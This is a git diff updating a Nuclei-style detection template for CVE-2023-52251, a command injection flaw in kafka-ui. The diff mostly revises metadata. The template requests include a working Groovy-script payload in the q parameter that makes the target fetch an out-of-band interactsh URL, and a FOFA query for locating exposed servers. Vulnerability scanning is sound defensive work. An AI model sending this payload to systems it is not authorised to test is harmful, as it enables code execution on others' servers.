diff --git a/http/cves/2023/CVE-2023-52251.yaml b/http/cves/2023/CVE-2023-52251.yaml index 85d518d9f6..84e54aaa0b 100644 --- a/http/cves/2023/CVE-2023-52251.yaml +++ b/http/cves/2023/CVE-2023-52251.yaml @@ -1,25 +1,32 @@ id: CVE-2023-52251 info: - name: kafka-ui - RCE + name: Kafka UI 0.7.1 Command Injection author: yhy0 - severity: critical + severity: high description: | - Remote Code Execution vulnerability provectus/kafka-ui. - remediation: | - Do not expose to the Internet + An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages. reference: - https://github.com/BobTheShoplifter/CVE-2023-52251-POC - https://github.com/provectus/kafka-ui + - http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html + - https://github.com/nomi-sec/PoC-in-GitHub classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-52251 + cwe-id: CWE-94 + epss-score: 0.02881 + epss-percentile: 0.90497 + cpe: cpe:2.3:a:provectus:ui:*:*:*:*:*:kafka:*:* metadata: - max-request: 3 - fofa-query: icon_hash="-1477045616" verified: true - tags: cve,cve2023,rce,kafka,kafka-ui + max-request: 3 + vendor: provectus + product: ui + framework: kafka + fofa-query: icon_hash="-1477045616" + tags: packetstorm,cve,cve2023,rce,kafka,kafka-ui http: - method: GET @@ -27,7 +34,7 @@ http: - "{{BaseURL}}/api/clusters" - "{{BaseURL}}/api/clusters/{{cluster}}/topics?showInternal=true&search=&orderBy=NAME&sortOrder=ASC" - "{{BaseURL}}/api/clusters/{{cluster}}/topics/{{topic}}/messages?q=new%20URL%28%22http%3A%2F%2F{{interactsh-url}}%22%29.text&filterQueryType=GROOVY_SCRIPT&attempt=2&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING" - + matchers-condition: and matchers: - type: dsl @@ -36,19 +43,19 @@ http: - 'contains(body, "status\":\"online")' - 'status_code == 200' condition: and - + - type: dsl dsl: - 'contains(content_type, "application/json")' - 'contains(body, "name")' - "status_code == 200" condition: and - + - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - + extractors: - type: json name: cluster